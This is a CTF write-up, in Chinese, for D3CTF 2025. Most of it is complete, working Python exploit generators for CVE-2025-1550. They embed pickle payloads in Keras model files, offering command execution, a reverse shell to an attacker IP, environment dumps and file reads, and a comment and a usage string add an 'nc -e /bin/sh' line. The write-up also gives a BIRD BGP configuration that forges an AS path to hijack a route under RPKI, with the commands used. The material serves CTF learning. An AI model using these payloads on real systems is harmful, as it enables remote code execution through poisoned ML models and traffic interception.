D3CTF 2025 wp
前言
队伍里出了点小事情,具体请看下方链接
d3model
打CVE-2025-1550,应该是pickle反序列化

相关文章
由于题目不出网,可以写进index.html来回显
最终exp如下(来自Q7师傅)
#!/usr/bin/env python3
"""
Utility functions for Keras NPZ pickle exploitation
"""
import pickle
import os
import subprocess
from keras.src.saving import saving_lib
class PayloadGenerator:
"""Collection of common CTF payloads for pickle deserialization"""
@staticmethod
def command_execution(command):
"""Execute arbitrary shell command"""
class CommandExecution:
def __reduce__(self):
return (os.system, (command,))
return CommandExecution()
@staticmethod
def reverse_shell(ip, port):
"""Create a reverse shell payload"""
class ReverseShell:
def __reduce__(self):
command = f"python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\\"{ip}\\",{port}));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call([\\"/bin/sh\\",\\"-i\\"]);'"
return (os.system, (command,))
return ReverseShell()
@staticmethod
def file_read(file_path, output_path="/tmp/flag_output"):
"""Read a file and save output"""
class FileRead:
def __reduce__(self):
command = f"cat {file_path} > {output_path}"
return (os.system, (command,))
return FileRead()
@staticmethod
def file_write(content, file_path):
"""Write content to a file"""
class FileWrite:
def __reduce__(self):
command = f"echo '{content}' > {file_path}"
return (os.system, (command,))
return FileWrite()
@staticmethod
def environment_dump(output_path="/tmp/env_dump"):
"""Dump environment variables"""
class EnvDump:
def __reduce__(self):
command = f"env > {output_path}"
return (os.system, (command,))
return EnvDump()
@staticmethod
def directory_listing(directory="/", output_path="/tmp/dir_listing"):
"""List directory contents"""
class DirList:
def __reduce__(self):
command = f"ls -la {directory} > {output_path}"
return (os.system, (command,))
return DirList()
@staticmethod
def python_code_execution(code):
"""Execute arbitrary Python code"""
class PythonExec:
def __reduce__(self):
return (exec, (code,))
return PythonExec()
def create_custom_payload():
"""Interactive payload creator"""
print("=== Custom Payload Generator ===")
print("Select payload type:")
print("1. Command execution")
print("2. Reverse shell")
print("3. File read")
print("4. File write")
print("5. Environment dump")
print("6. Directory listing")
print("7. Python code execution")
choice = input("Enter choice (1-7): ").strip()
if choice == "1":
command = input("Enter command to execute: ")
return PayloadGenerator.command_execution(command)
elif choice == "2":
ip = input("Enter attacker IP: ")
port = int(input("Enter port: "))
return PayloadGenerator.reverse_shell(ip, port)
elif choice == "3":
file_path = input("Enter file path to read: ")
output_path = input("Enter output path (default: /tmp/flag_output): ") or "/tmp/flag_output"
return PayloadGenerator.file_read(file_path, output_path)
elif choice == "4":
content = input("Enter content to write: ")
file_path = input("Enter output file path: ")
return PayloadGenerator.file_write(content, file_path)
elif choice == "5":
output_path = input("Enter output path (default: /tmp/env_dump): ") or "/tmp/env_dump"
return PayloadGenerator.environment_dump(output_path)
elif choice == "6":
directory = input("Enter directory to list (default: /): ") or "/"
output_path = input("Enter output path (default: /tmp/dir_listing): ") or "/tmp/dir_listing"
return PayloadGenerator.directory_listing(directory, output_path)
elif choice == "7":
code = input("Enter Python code to execute: ")
return PayloadGenerator.python_code_execution(code)
else:
print("Invalid choice")
return None
def test_payload_locally(payload):
"""Test a payload locally (BE CAREFUL!)"""
print("\\n[WARNING] This will execute the payload locally!")
print("Make sure you understand what it does before proceeding.")
response = input("Continue with local test? (y/N): ")
if response.lower() != 'y':
print("Test cancelled.")
return
try:
# Serialize and deserialize the payload
pickled = pickle.dumps(payload)
print("[+] Payload serialized successfully")
print("[+] Executing payload...")
unpickled = pickle.loads(pickled)
print("[+] Payload executed!")
except Exception as e:
print(f"[!] Error: {e}")
def analyze_keras_file(filename):
"""Analyze a .keras file structure"""
import zipfile
try:
with zipfile.ZipFile(filename, 'r') as zf:
print(f"\\n=== Analysis of {filename} ===")
print("Files in archive:")
for info in zf.infolist():
print(f" {info.filename} ({info.file_size} bytes)")
if info.filename.endswith('.npz'):
print(f" -> NPZ file detected (target for injection)")
elif info.filename.endswith('.json'):
print(f" -> Configuration file")
except Exception as e:
print(f"Error analyzing file: {e}")
def create_custom_exploit():
"""Create a custom exploit with user-defined payload"""
from refined_exploit import create_base_keras_model
import zipfile
import tempfile
import numpy as np
print("=== Custom Exploit Creator ===")
# Get custom payload
payload = create_custom_payload()
if not payload:
return
# Create base model
print("\\n[+] Creating base Keras model...")
model = create_base_keras_model()
# Save with NPZ
temp_path = 'custom_temp.keras'
# model.save(temp_path, weights_format='npz')
saving_lib.save_model(model, temp_path, weights_format='npz')
# Create malicious NPZ
print("[+] Creating malicious NPZ with custom payload...")
with tempfile.NamedTemporaryFile(suffix='.npz', delete=False) as f:
# np.savez(f.name,
# normal_data=np.array([1, 2, 3]),
# malicious_payload=payload)
np.savez(f.name, __root__=payload)
with open(f.name, 'rb') as npz_file:
malicious_npz = npz_file.read()
# Replace NPZ in keras file
output_file = 'custom_exploit.keras'
with zipfile.ZipFile(temp_path, 'r') as original:
with zipfile.ZipFile(output_file, 'w') as new_zip:
for item in original.infolist():
if item.filename.endswith('.npz'):
new_zip.writestr(item.filename, malicious_npz)
else:
new_zip.writestr(item.filename, original.read(item.filename))
# Cleanup
os.remove(temp_path)
os.unlink(f.name)
print(f"[+] Custom exploit created: {output_file}")
# Test option
test_choice = input("\\nTest payload locally? (y/N): ")
if test_choice.lower() == 'y':
test_payload_locally(payload)
if __name__ == "__main__":
print("=== Keras NPZ Exploit Utilities ===")
print("1. Create custom exploit")
print("2. Test payload locally")
print("3. Analyze .keras file")
print("4. Generate common payloads")
choice = input("\\nSelect option (1-4): ").strip()
if choice == "1":
create_custom_exploit()
elif choice == "2":
payload = create_custom_payload()
if payload:
test_payload_locally(payload)
elif choice == "3":
filename = input("Enter .keras file path: ")
analyze_keras_file(filename)
elif choice == "4":
print("\\n=== Common CTF Payloads ===")
print("Command execution:", PayloadGenerator.command_execution("whoami"))
print("File read:", PayloadGenerator.file_read("/etc/passwd"))
print("Environment dump:", PayloadGenerator.environment_dump())
print("Directory listing:", PayloadGenerator.directory_listing("/"))
else:
print("Invalid choice")
#!/usr/bin/env python3
import keras
import tensorflow as tf
import numpy as np
import pickle
import zipfile
import io
import os
import tempfile
def create_malicious_payload():
"""Create a malicious pickle payload"""
class RCE:
def __reduce__(self):
import os
# Modify this command for your specific CTF needs
# Example payloads:
# For file creation: "touch /tmp/exploited"
# For reverse shell: "nc -e /bin/sh attacker_ip port"
# For flag reading: "cat /flag > /tmp/flag_output"
cmd = "echo 'RCE via Keras NPZ pickle exploit' > /tmp/keras_pwned"
return (os.system, (cmd,))
return RCE()
def create_poisoned_npz_data():
"""Create NPZ data with embedded pickle payload"""
# Create legitimate weight arrays
weights = {
'dense_kernel': np.random.random((4, 10)).astype(np.float32),
'dense_bias': np.random.random((10,)).astype(np.float32),
'dense_1_kernel': np.random.random((10, 1)).astype(np.float32),
'dense_1_bias': np.random.random((1,)).astype(np.float32)
}
# Create the malicious payload
payload = create_malicious_payload()
# Create a buffer for our NPZ file
buffer = io.BytesIO()
# This is the key: we'll create an NPZ file where one of the arrays
# contains our pickle payload instead of legitimate numpy data
with zipfile.ZipFile(buffer, 'w', zipfile.ZIP_DEFLATED) as zf:
# Add legitimate weight arrays
for name, array in weights.items():
array_buffer = io.BytesIO()
np.save(array_buffer, array)
array_buffer.seek(0)
zf.writestr(f'{name}.npy', array_buffer.getvalue())
# Add our malicious pickle payload as a fake numpy array
# When numpy.load tries to load this, it will unpickle our payload
pickled_data = pickle.dumps(payload)
# Create a fake .npy file header followed by our pickle data
fake_npy_buffer = io.BytesIO()
# NPY file format: magic string + version + header + data
# We'll create a minimal valid header that will cause numpy to
# process our pickle data
magic = b'\\x93NUMPY'
version = b'\\x01\\x00' # version 1.0
# Create a header that describes our pickle data as an object array
import struct
header_dict = {
'descr': '|O', # object dtype - this allows pickle data
'fortran_order': False,
'shape': () # scalar
}
header_str = str(header_dict).replace("'", '"').replace('False', 'false')
header_bytes = header_str.encode('latin1')
# Pad header to 64 bytes boundary
header_len = len(header_bytes)
pad_len = (64 - (len(magic) + len(version) + 2 + header_len)) % 64
header_bytes += b' ' * pad_len
# Write the NPY header
fake_npy_buffer.write(magic)
fake_npy_buffer.write(version)
fake_npy_buffer.write(struct.pack('<H', len(header_bytes)))
fake_npy_buffer.write(header_bytes)
# Write our pickle payload as the data
fake_npy_buffer.write(pickled_data)
# Add this as a weight file
zf.writestr('malicious_weight.npy', fake_npy_buffer.getvalue())
buffer.seek(0)
return buffer.getvalue()
def create_base_keras_model():
"""Create a legitimate Keras model"""
model = keras.Sequential([
keras.layers.Dense(10, activation='relu', input_shape=(4,), name='dense'),
# keras.layers.Dense(1, activation='sigmoid', name='dense_1')
])
# model.compile(optimizer='adam', loss='binary_crossentropy')
# Initialize with dummy data
# X = np.random.random((10, 4))
# y = np.random.randint(2, size=(10, 1))
# model.fit(X, y, epochs=1, verbose=0)
return model
def create_malicious_keras_model():
"""Create the main exploit"""
print("[+] Creating base Keras model...")
model = create_base_keras_model()
print("[+] Saving model with NPZ weights...")
temp_model_path = 'temp_model.keras'
model.save(temp_model_path, save_format='keras', weights_format='npz')
print("[+] Creating malicious NPZ payload...")
malicious_npz = create_poisoned_npz_data()
print("[+] Injecting malicious NPZ into .keras file...")
# Read the original .keras file and modify it
with zipfile.ZipFile(temp_model_path, 'r') as original:
file_list = original.namelist()
# Create the malicious model
with zipfile.ZipFile('malicious_model.keras', 'w', zipfile.ZIP_DEFLATED) as malicious:
for filename in file_list:
if filename.endswith('model.weights.npz'):
# Replace the weights file with our malicious one
print(f"[+] Replacing {filename} with malicious NPZ")
malicious.writestr(filename, malicious_npz)
else:
# Copy other files unchanged
content = original.read(filename)
malicious.writestr(filename, content)
# Clean up
os.remove(temp_model_path)
print("[+] Malicious model created: malicious_model.keras")
return 'malicious_model.keras'
def create_simple_exploit():
"""Alternative simpler approach - direct NPZ replacement"""
print("[+] Creating simple exploit model...")
# Create a minimal model
model = keras.Sequential([keras.layers.Dense(1, input_shape=(1,))])
model.compile(optimizer='adam', loss='mse')
# Save with NPZ format
model.save('simple_model.keras', weights_format='npz')
# Create malicious NPZ with pickle payload
payload = create_malicious_payload()
# Create a simple NPZ file with our payload
with tempfile.NamedTemporaryFile(suffix='.npz', delete=False) as f:
# Save some dummy data and our payload
np.savez(f.name,
legitimate_data=np.array([1, 2, 3]),
malicious_object=payload) # This will be pickled
with open(f.name, 'rb') as npz_file:
malicious_npz_data = npz_file.read()
# Replace the NPZ in the keras file
with zipfile.ZipFile('simple_model.keras', 'r') as original:
with zipfile.ZipFile('simple_exploit.keras', 'w') as new_zip:
for item in original.infolist():
if item.filename.endswith('.npz'):
new_zip.writestr(item.filename, malicious_npz_data)
else:
new_zip.writestr(item.filename, original.read(item.filename))
os.remove('simple_model.keras')
os.unlink(f.name)
print("[+] Simple exploit created: simple_exploit.keras")
return 'simple_exploit.keras'
def main():
print("=== Keras NPZ Pickle Deserialization Exploit Generator ===")
print()
print("This script creates malicious Keras models that exploit pickle")
print("deserialization vulnerabilities in the NPZ weight loading process.")
print()
print("Creating exploits...")
# Create the main exploit
exploit1 = create_malicious_keras_model()
# Create the simple exploit
exploit2 = create_simple_exploit()
print("\\n" + "="*60)
print("EXPLOIT FILES CREATED:")
print(f"1. {exploit1} - Advanced NPZ injection")
print(f"2. {exploit2} - Simple NPZ replacement")
print()
print("USAGE:")
print("1. Upload either file to the target Flask application")
print("2. The exploit triggers when keras.models.load_model() is called")
print("3. Current payload: Creates /tmp/keras_pwned file")
print()
print("CUSTOMIZATION:")
print("- Modify create_malicious_payload() for custom commands")
print("- Common CTF payloads:")
print(" * File read: 'cat /flag > /tmp/flag'")
print(" * Reverse shell: 'nc -e /bin/sh IP PORT'")
print(" * Command execution: Any shell command")
print()
print("WARNING: These files contain malicious code!")
if __name__ == "__main__":
main()

选择7 Python code execution,然后输入import os;os.system(”env > index.html”)生成keras并上传,最后刷新网页即可拿到flag
d3RPKI
t1(AS4211110001):运行 RPKI 服务器,连接多个网络,包括 nw0(10.0.0.1)。
t2-1(AS4211110002):控制的节点,连接 nw0(10.0.0.2)和外部网络,运行 BIRD 协议,开放 SSH。
t2-2(AS4211110003):定期向 10.4.0.5:1234 发送 FLAG。
t2-3(AS4211110004):连接 nw2 和 subnet4(10.4.0.1)。
protocol static {
ipv4 {
table BGP_table;
import all;
export none;
};
route 10.4.0.5/32 reject;
}
在 t2-1 的路由表中注入一个静态路由 10.4.0.5/32,状态为 reject
虽然路由被标记为不可达,但它会被注入到 BGP_table 中,并通过 BGP 协议向外宣布
template bgp BGP_peers {
ipv4 {
table BGP_table;
export filter {
if net = 10.4.0.5/32 then {
bgp_path.empty;
bgp_path.prepend(4211110004);
accept;
}
if source ~ [RTS_STATIC, RTS_BGP] then accept;
reject;
};
};
}
protocol bgp t1 from BGP_peers {
local 10.0.0.2 as 4211110002;
neighbor 10.0.0.1 as 4211110001;
}
t2-1 向 t1 宣布 10.4.0.5/32 的路由时,AS 路径被伪造成 [4211110004],像是从 AS4211110004(t2-3)发起的
t1 验证后接受此路由,并将其传播给网络中的其他节点,t2-2 更新其路由表,认为 10.4.0.5 可以通过 t1 到达,最终流量会到达t2-1
将 10.4.0.5 的 IP 地址绑定到 t2-1 的接口,并监听 1234 端口,即可拿到flag
完整解法如下:
首先修改/etc/bird/bird.conf
log syslog all;
debug protocols all;
router id 10.2.0.1;
ipv4 table BGP_table;
protocol device {
}
protocol kernel {
scan time 10;
ipv4 {
export all;
import none;
};
}
protocol static {
ipv4 {
table BGP_table;
import all;
export none;
};
route 10.2.0.0/24 reject;
route 10.4.0.5/32 reject;
}
roa4 table r4;
protocol rpki {
debug all;
roa4 { table r4; };
remote "10.0.0.1" port 8083;
retry keep 5;
refresh keep 30;
expire 600;
}
template bgp BGP_peers {
ipv4 {
table BGP_table;
import filter {
if roa_check(r4, net, bgp_path.last) !~ [ROA_VALID] then {
print "ROA check failed for ", net, " ASN ", bgp_path.last;
reject;
}
accept;
};
export filter {
if net = 10.4.0.5/32 then {
bgp_path.empty;
bgp_path.prepend(4211110004);
accept;
}
if source ~ [RTS_STATIC, RTS_BGP] then accept;
reject;
};
};
}
protocol pipe {
table master4;
peer table BGP_table;
import filter {
if source = RTS_STATIC then reject;
krt_prefsrc = 10.2.0.1;
accept;
};
export none;
}
protocol bgp t1 from BGP_peers {
local 10.0.0.2 as 4211110002;
neighbor 10.0.0.1 as 4211110001;
}
然后运行命令即可
Last login: Tue May 20 10:43:49 2025 from 100.64.5.2
root@b04002374330:~# service bird restart
* Restarting BIRD Internet Routing Daemon bird [ OK ]
root@b04002374330:~# ip addr add 10.4.0.5/32 dev eth0
root@b04002374330:~# nc -l 10.4.0.5 1234
d3ctf{c9780467-2ff8-4ccf-96e1-49b36e3f6822}D^3Rpg - Signin
一开始跟着解misc
后面发现钱数刷满128就会给flag

解码出来W3lc0m3_7o_d3_RpG_W0r1d
le0n师傅这次太强了
几乎把web方向给ak了